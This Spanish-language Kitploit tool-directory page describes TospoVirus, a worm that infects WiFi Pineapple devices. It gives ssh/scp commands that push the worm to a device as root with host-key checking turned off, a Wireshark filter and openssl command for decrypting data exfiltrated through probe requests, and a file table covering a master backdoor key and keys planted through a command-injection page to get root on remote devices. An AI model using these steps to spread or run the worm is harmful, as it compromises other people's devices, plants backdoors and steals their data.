Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
TospoVirus — Un gusano que infecta WiFi Pineapple. | Kitploit
Herramientas/GitHubGitHub/catatonicprime/tospovirus
Mecanismos de PersistenciaExplotaciónMovimiento LateralExfiltración de DatosPost-ExplotaciónSeguridad InalámbricaComando y ControlTroyano de Acceso Remoto
GitHubcatatonicprime/tospovirus

TospoVirus

Un gusano que infecta WiFi Pineapple.

Ver Repositorio
1747hace 11 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Compilación de TospoVirus para distribución:

./build.sh

Distribución a un pineapple funcional con la versión 2.3:

ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Nota: Necesitará tener un dispositivo configurado O usar el módulo de metasploit para habilitar ssh

Descifrado de datos exfiltrados:

El filtro de wireshark es:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem

Opcionalmente, use el script harvest.py de la siguiente manera:
python harvest.py [monitor-iface]

Archivos y propósito:

Descargar herramienta
ArchivoPropósito
tvEl virus en sí.
tvbdLa clave backdoor "maestra", no distribuya la clave privada.
tvdLa clave de divulgación, utilizada para exfiltrar datos mediante probe requests.
tospo_rsaLa clave privada de identidad, específica de cada dispositivo infectado, utilizada como clave de transferencia.
tospo_rsa.pubLa clave pública de identidad, transferida a través de la página de inyección de comandos para permitir que la identidad privada realice acciones como root en el dispositivo remoto.
wOpciones de configuración inalámbrica enviadas, utilizadas para restaurar conexiones anteriores.
nOpciones de configuración de red enviadas, utilizadas para restaurar conexiones anteriores.
Nota: Todos los archivos que comienzan con 'tv' se transfieren al infectar un nuevo dispositivo. No agregue claves privadas ni similares con nombres que comiencen con 'tv'; de lo contrario, su clave privada quedará expuesta al análisis forense.